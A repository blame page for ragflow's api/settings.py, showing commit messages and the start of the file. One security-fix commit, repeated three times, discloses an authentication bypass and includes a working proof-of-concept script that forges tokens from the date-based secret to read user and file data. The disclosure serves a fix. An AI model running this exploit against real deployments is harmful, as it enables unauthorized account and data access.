OpenSource
/
ragflow
關註 4
收藏 0
複製 0
程式碼 問題管理 0 合併請求 0 版本發佈 33 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
3582 Commit
7 分支
目錄樹: 6ec3f18e22
分支列表 標籤列表
${ item.name }
Create branch ${ searchTerm }
from '6ec3f18e22'
${ noResults }
ragflow/api/settings.py

settings.py 7.2KB
原始文件 Normal View 文件歷史

Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 月之前
add owner check for team work (#2892) ### What problem does this PR solve? #2834 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1 年之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Integration with Infinity (#2894) ### What problem does this PR solve? Integration with Infinity - Replaced ELASTICSEARCH with dataStoreConn - Renamed deleteByQuery with delete - Renamed bulk to upsertBulk - getHighlight, getAggregation - Fix KGSearch.search - Moved Dealer.sql_retrieval to es_conn.py ### Type of change - [x] Refactoring
11 月之前
Fix: anthropic llm issue. (#8633) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)
4 月之前
Remove unused code (#3448) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Fix: Reduce excessive IO operations by loading LLM factory configurations (#6047) …ions ### What problem does this PR solve? This PR fixes an issue where the application was repeatedly reading the llm_factories.json file from disk in multiple places, which could lead to "Too many open files" errors under high load conditions. The fix centralizes the file reading operation in the settings.py module and stores the data in a global variable that can be accessed by other modules. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [x] Performance Improvement - [ ] Other (please describe):
7 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Fix: Reduce excessive IO operations by loading LLM factory configurations (#6047) …ions ### What problem does this PR solve? This PR fixes an issue where the application was repeatedly reading the llm_factories.json file from disk in multiple places, which could lead to "Too many open files" errors under high load conditions. The fix centralizes the file reading operation in the settings.py module and stores the data in a global variable that can be accessed by other modules. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [x] Performance Improvement - [ ] Other (please describe):
7 月之前
add owner check for team work (#2892) ### What problem does this PR solve? #2834 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1 年之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Common: Support postgreSQL database as the metadata db. (#2357) https://github.com/infiniflow/ragflow/issues/2356 ### What problem does this PR solve? As title ### Type of change - [X] New Feature (non-breaking change which adds functionality)
1 年之前
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Add support for OAuth2 and OpenID Connect (OIDC) authentication (#7379) ### What problem does this PR solve? Add support for OAuth2 and OpenID Connect (OIDC) authentication, allowing OAuth/OIDC authentication using the specified routes: - `/login/<channel>`: Initiates the OAuth flow for the specified channel - `/oauth/callback/<channel>`: Handles the OAuth callback after successful authentication The callback URL should be configured in your OAuth provider as: ``` https://your-app.com/oauth/callback/<channel> ``` For detailed instructions on configuring **service_conf.yaml.template**, see: `./api/apps/auth/README.md#usage`. - Related issues #3495 ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Add user registration toggle feature (#6327) ### What problem does this PR solve? Feat: Add user registration toggle feature. Added a user registration toggle REGISTER_ENABLED in the settings and .env config file. The user creation interface now checks the state of this toggle to control the enabling and disabling of the user registration feature. the front-end implementation is done, the registration button does not appear if registration is not allowed. I did the actual tests on my local server and it worked smoothly. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: wenju.li <wenju.li@deepctr.cn> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
7 月之前
Feat: launch sandbox from docker-compose (#7671) ### What problem does this PR solve? Launch sandbox from docker-compose. #4977 ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update --------- Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
5 月之前
Refactor: support config strong test (#9198) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/9189#issuecomment-3148920950 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
3 月之前
Feat: launch sandbox from docker-compose (#7671) ### What problem does this PR solve? Launch sandbox from docker-compose. #4977 ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update --------- Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
5 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Add user registration toggle feature (#6327) ### What problem does this PR solve? Feat: Add user registration toggle feature. Added a user registration toggle REGISTER_ENABLED in the settings and .env config file. The user creation interface now checks the state of this toggle to control the enabling and disabling of the user registration feature. the front-end implementation is done, the registration button does not appear if registration is not allowed. I did the actual tests on my local server and it worked smoothly. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: wenju.li <wenju.li@deepctr.cn> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
7 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Ensure LIGHTEN work (#3542) ### What problem does this PR solve? #3531 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)
11 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Add configuration to choose default llm models (#5245) ### What problem does this PR solve? This pull request includes changes to the `api/settings.py` and `docker/service_conf.yaml.template` files to add support for default models in the LLM configuration (specially for LIGHTEN builds). The most important changes include adding default model configurations and updating the initialization settings to use these defaults. For example: With this configuration Bedrock will be enable by default with claude and titan embeddings. ``` user_default_llm: factory: 'Bedrock' api_key: '{}' base_url: '' default_models: chat_model: 'anthropic.claude-3-5-sonnet-20240620-v1:0' embedding_model: 'amazon.titan-embed-text-v2:0' rerank_model: '' asr_model: '' image2text_model: '' ``` ### Type of change - [X] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
8 月之前
Feat: change default models (#7777) ### What problem does this PR solve? change default models to buildin models https://github.com/infiniflow/ragflow/issues/7774 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
5 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Add user registration toggle feature (#6327) ### What problem does this PR solve? Feat: Add user registration toggle feature. Added a user registration toggle REGISTER_ENABLED in the settings and .env config file. The user creation interface now checks the state of this toggle to control the enabling and disabling of the user registration feature. the front-end implementation is done, the registration button does not appear if registration is not allowed. I did the actual tests on my local server and it worked smoothly. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: wenju.li <wenju.li@deepctr.cn> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
7 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Fix: Reduce excessive IO operations by loading LLM factory configurations (#6047) …ions ### What problem does this PR solve? This PR fixes an issue where the application was repeatedly reading the llm_factories.json file from disk in multiple places, which could lead to "Too many open files" errors under high load conditions. The fix centralizes the file reading operation in the settings.py module and stores the data in a global variable that can be accessed by other modules. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [x] Performance Improvement - [ ] Other (please describe):
7 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Add configuration to choose default llm models (#5245) ### What problem does this PR solve? This pull request includes changes to the `api/settings.py` and `docker/service_conf.yaml.template` files to add support for default models in the LLM configuration (specially for LIGHTEN builds). The most important changes include adding default model configurations and updating the initialization settings to use these defaults. For example: With this configuration Bedrock will be enable by default with claude and titan embeddings. ``` user_default_llm: factory: 'Bedrock' api_key: '{}' base_url: '' default_models: chat_model: 'anthropic.claude-3-5-sonnet-20240620-v1:0' embedding_model: 'amazon.titan-embed-text-v2:0' rerank_model: '' asr_model: '' image2text_model: '' ``` ### Type of change - [X] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
8 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Add support for OAuth2 and OpenID Connect (OIDC) authentication (#7379) ### What problem does this PR solve? Add support for OAuth2 and OpenID Connect (OIDC) authentication, allowing OAuth/OIDC authentication using the specified routes: - `/login/<channel>`: Initiates the OAuth flow for the specified channel - `/oauth/callback/<channel>`: Handles the OAuth callback after successful authentication The callback URL should be configured in your OAuth provider as: ``` https://your-app.com/oauth/callback/<channel> ``` For detailed instructions on configuring **service_conf.yaml.template**, see: `./api/apps/auth/README.md#usage`. - Related issues #3495 ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Add support for OAuth2 and OpenID Connect (OIDC) authentication (#7379) ### What problem does this PR solve? Add support for OAuth2 and OpenID Connect (OIDC) authentication, allowing OAuth/OIDC authentication using the specified routes: - `/login/<channel>`: Initiates the OAuth flow for the specified channel - `/oauth/callback/<channel>`: Handles the OAuth callback after successful authentication The callback URL should be configured in your OAuth provider as: ``` https://your-app.com/oauth/callback/<channel> ``` For detailed instructions on configuring **service_conf.yaml.template**, see: `./api/apps/auth/README.md#usage`. - Related issues #3495 ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update
6 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
refa: Optimize create dataset validation (#7451) ### What problem does this PR solve? Optimize dataset validation and add function docs ### Type of change - [x] Refactoring
6 月之前
Feat: Adds OpenSearch2.19.1 as the vector_database support (#7140) ### What problem does this PR solve? This PR adds the support for latest OpenSearch2.19.1 as the store engine & search engine option for RAGFlow. ### Main Benefit 1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is much better than Elasticsearch 2. For search, OpenSearch2.19.1 supports full-text search、vector_search、hybrid_search those are similar with Elasticsearch on schema 3. For store, OpenSearch2.19.1 stores text、vector those are quite simliar with Elasticsearch on schema ### Changes - Support opensearch_python_connetor. I make a lot of adaptions since the schema and api/method between ES and Opensearch differs in many ways(especially the knn_search has a significant gap) : rag/utils/opensearch_coon.py - Support static config adaptions by changing: conf/service_conf.yaml、api/settings.py、rag/settings.py - Supprt some store&search schema changes between OpenSearch and ES: conf/os_mapping.json - Support OpenSearch python sdk : pyproject.toml - Support docker config for OpenSearch2.19.1 : docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template ### How to use - I didn't change the priority that ES as the default doc/search engine. Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it will work. ### Others Our team tested a lot of docs in our environment by using OpenSearch as the vector database ,it works very well. All the conifg for OpenSearch is necessary. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Yongteng Lei <yongtengrey@outlook.com> Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com> Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
6 月之前
Case insensitive when set doc engine (#3954) ### What problem does this PR solve? DOC_ENGINE="INFINITY" or "Infinity" or "Elasticsearch" also works ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
11 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Case insensitive when set doc engine (#3954) ### What problem does this PR solve? DOC_ENGINE="INFINITY" or "Infinity" or "Elasticsearch" also works ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
11 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: Adds OpenSearch2.19.1 as the vector_database support (#7140) ### What problem does this PR solve? This PR adds the support for latest OpenSearch2.19.1 as the store engine & search engine option for RAGFlow. ### Main Benefit 1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is much better than Elasticsearch 2. For search, OpenSearch2.19.1 supports full-text search、vector_search、hybrid_search those are similar with Elasticsearch on schema 3. For store, OpenSearch2.19.1 stores text、vector those are quite simliar with Elasticsearch on schema ### Changes - Support opensearch_python_connetor. I make a lot of adaptions since the schema and api/method between ES and Opensearch differs in many ways(especially the knn_search has a significant gap) : rag/utils/opensearch_coon.py - Support static config adaptions by changing: conf/service_conf.yaml、api/settings.py、rag/settings.py - Supprt some store&search schema changes between OpenSearch and ES: conf/os_mapping.json - Support OpenSearch python sdk : pyproject.toml - Support docker config for OpenSearch2.19.1 : docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template ### How to use - I didn't change the priority that ES as the default doc/search engine. Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it will work. ### Others Our team tested a lot of docs in our environment by using OpenSearch as the vector database ,it works very well. All the conifg for OpenSearch is necessary. ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: Yongteng Lei <yongtengrey@outlook.com> Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com> Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
6 月之前
fix settings global docStoreConn for opensearch (#8885) ### What problem does this PR solve? fix opensearch OSConnection init. ``` docStoreConn = rag.utils.opensearch_conn.OSConnection() ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
3 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Perf: set timeout of some steps in KG. (#8873) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement
3 月之前
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 月之前
Feat: launch sandbox from docker-compose (#7671) ### What problem does this PR solve? Launch sandbox from docker-compose. #4977 ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update --------- Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
5 月之前
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 年之前
Feat:Compatible with Dify's External Knowledge API (#2848) ### What problem does this PR solve? _Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._ Fixes #2731 ### Type of change - [x] New Feature (non-breaking change which adds functionality)
1 年之前
 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212 
  1. #

  2. #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.

  3. #

  4. #  Licensed under the Apache License, Version 2.0 (the "License");

  5. #  you may not use this file except in compliance with the License.

  6. #  You may obtain a copy of the License at

  7. #

  8. #      http://www.apache.org/licenses/LICENSE-2.0

  9. #

  10. #  Unless required by applicable law or agreed to in writing, software

  11. #  distributed under the License is distributed on an "AS IS" BASIS,

  12. #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

  13. #  See the License for the specific language governing permissions and

  14. #  limitations under the License.

  15. #

  16. import json

  17. import os

  18. import secrets

  19. from datetime import date

  20. from enum import Enum, IntEnum

  21. 

  22. import rag.utils

  23. import rag.utils.es_conn

  24. import rag.utils.infinity_conn

  25. import rag.utils.opensearch_conn

  26. from api.constants import RAG_FLOW_SERVICE_NAME

  27. from api.utils import decrypt_database_config, get_base_config

  28. from api.utils.file_utils import get_project_base_directory

  29. from rag.nlp import search

  30. 

